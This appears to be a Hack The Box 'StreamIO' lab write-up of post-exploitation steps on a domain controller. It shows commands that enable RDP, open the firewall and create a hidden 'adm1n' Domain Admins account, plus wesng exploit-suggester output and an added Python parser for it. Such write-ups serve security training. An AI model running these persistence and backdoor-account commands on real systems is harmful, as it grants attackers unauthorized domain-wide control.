Beyond


This is the Beyond page, where additional post-exploitation enumeration and assessment are conducted as SYSTEM after compromising the target system.

Prep


C:\Windows\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
 
C:\Windows\system32> netsh firewall add portopening TCP 3389 "Remote Desktop"
 
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.

Enabling RDP

C:\Windows\system32> NET user adm1n Qwer1234 /ADD /DOMAIN
The command completed successfully.
 
C:\Windows\system32> NET groups "Domain Admins" /DOMAIN /ADD adm1n
The command completed successfully.

dummy account

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ xfreerdp /u:adm1n /p:Qwer1234 /v:dc.streamio.htb /cert:ignore /dynamic-resolution /tls-seclevel:0 

RDP

established

mmc

Scheduled Task


cleaning


C:\Users\Administrator\Documents\clearing.bat


ps c:\Windows\system32> cat C:\Users\Administrator\Documents\clearing.bat
net group "CORE STAFF" nikk37 /del /dom
net group "CORE STAFF" yoshihide /del /dom
net group "CORE STAFF" JDgodd /del /dom
dsacls "CN=CORE STAFF,CN=Users,DC=streamIO,DC=htb" -resetdefaultdacl
dsacls "cn=core staff,cn=users,dc=streamio,dc=htb" /g "streamio.htb\jdgodd:WO"

SMB


C:\Windows\system32> net share
 
Share name   Resource                                Remark
 
-------------------------------------------------------------------------------
C$           C:\                                     Default share                     
IPC$                                                 Remote IPC                        
ADMIN$       C:\Windows                              Remote Admin                      
NETLOGON     C:\Windows\SYSVOL\sysvol\streamIO.htb\SCRIPTS
                                                     Logon server share                
SYSVOL       C:\Windows\SYSVOL\sysvol                Logon server share                
The command completed successfully.

Web


MSSQL


Users and Groups


Core Staff


Vulnerabilities


┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ wes --update ; wes sysinfo.txt -c --exploits-only --hide "Internet Explorer" Edge Flash -s critical           
windows exploit suggester 1.02 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20231110
windows exploit suggester 1.02 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - name: Windows Server 2019
    - generation: 2019
    - build: 17763
    - version: 1809
    - architecture: x64-based
    - installed hotfixes: None
[+] Loading definitions
    - creation date of definitions: 20231110
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[!] Found vulnerabilities!
 
date: 20200512
cve: CVE-2020-0646
kb: KB4535101
title: .NET Framework Remote Code Execution Injection Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
affected component: .NET Framework
severity: Critical
impact: Remote Code Execution
exploit: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
date: 20200512
cve: CVE-2020-0646
kb: KB4535101
title: .NET Framework Remote Code Execution Injection Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
affected component: .NET Framework
severity: Critical
impact: Remote Code Execution
exploit: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
date: 20200512
cve: CVE-2020-0646
kb: KB4535101
title: .NET Framework Remote Code Execution Injection Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
affected component: .NET Framework
severity: Critical
impact: Remote Code Execution
exploit: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
date: 20200512
cve: CVE-2020-0646
kb: KB4535101
title: .NET Framework Remote Code Execution Injection Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
affected component: .NET Framework
severity: Critical
impact: Remote Code Execution
exploit: http://packetstormsecurity.com/files/156930/SharePoint-Workflows-XOML-Injection.html
 
date: 20200714
cve: CVE-2020-1147
kb: KB4578966
title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
affected component: Microsoft
severity: Critical
impact: Remote Code Execution
exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
 
date: 20200714
cve: CVE-2020-1147
kb: KB4578966
title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
affected component: Microsoft
severity: Critical
impact: Remote Code Execution
exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
 
date: 20200714
cve: CVE-2020-1147
kb: KB4578966
title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.8 on Windows Server 2019
affected component: Microsoft
severity: Critical
impact: Remote Code Execution
exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
 
date: 20200714
cve: CVE-2020-1147
kb: KB4578966
title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability
affected product: Microsoft .NET Framework 3.5 AND 4.7.2 on Windows Server 2019
affected component: Microsoft
severity: Critical
impact: Remote Code Execution
exploits: http://packetstormsecurity.com/files/158694/SharePoint-DataSet-DataTable-Deserialization.html, http://packetstormsecurity.com/files/158876/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html, https://www.exploitalert.com/view-details.html?id=35992, http://packetstormsecurity.com/files/163644/Microsoft-SharePoint-Server-2019-Remote-Code-Execution.html
 
[-] missing patches: 2
    - kb4535101: patches 4 vulnerabilities
    - kb4578966: patches 4 vulnerabilities
[I] KB with the most recent release date
    - id: KB4578966
    - release date: 20200714
[+] Done. Displaying 8 of the 761 vulnerabilities found.
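When triaging wesng output like the above across several hosts, the repeated records (one per affected .NET version) get in the way. The following Python is an added example, not code from the original writeup or from wesng, that parses wesng's key/value record format, collapses the duplicates, and groups the unique CVEs under the KB that closes them; the sample input is constructed from the records shown above.

```python
"""Parse wesng record output into a per-KB patch summary.
Added example, not part of the original writeup or of wesng itself."""
import re
from collections import defaultdict

# Constructed sample, trimmed from the records wesng printed above.
SAMPLE = """\
[!] Found vulnerabilities!

date: 20200512
cve: CVE-2020-0646
kb: KB4535101
title: .NET Framework Remote Code Execution Injection Vulnerability

date: 20200512
cve: CVE-2020-0646
kb: KB4535101
title: .NET Framework Remote Code Execution Injection Vulnerability

date: 20200714
cve: CVE-2020-1147
kb: KB4578966
title: .NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability

[-] missing patches: 2
"""

FIELD = re.compile(r"^([a-z ]+): (.*)$")  # status lines start with '[' and never match

def parse_records(text):
    """Split wesng output into one dict per blank-line-separated record."""
    records, current = [], {}
    for line in text.splitlines():
        m = FIELD.match(line)
        if m:
            current[m.group(1)] = m.group(2)
        elif current:  # a blank or status line closes the record in progress
            records.append(current)
            current = {}
    if current:
        records.append(current)
    return [r for r in records if "cve" in r]

def missing_patches(text):
    """Map each KB to the sorted unique CVEs it closes (collapses duplicate records)."""
    by_kb = defaultdict(set)
    for r in parse_records(text):
        by_kb[r["kb"]].add(r["cve"])
    return {kb: sorted(cves) for kb, cves in sorted(by_kb.items())}
```

Feed it the real `wes` output instead of `SAMPLE` to get one line per missing KB rather than one per affected product version.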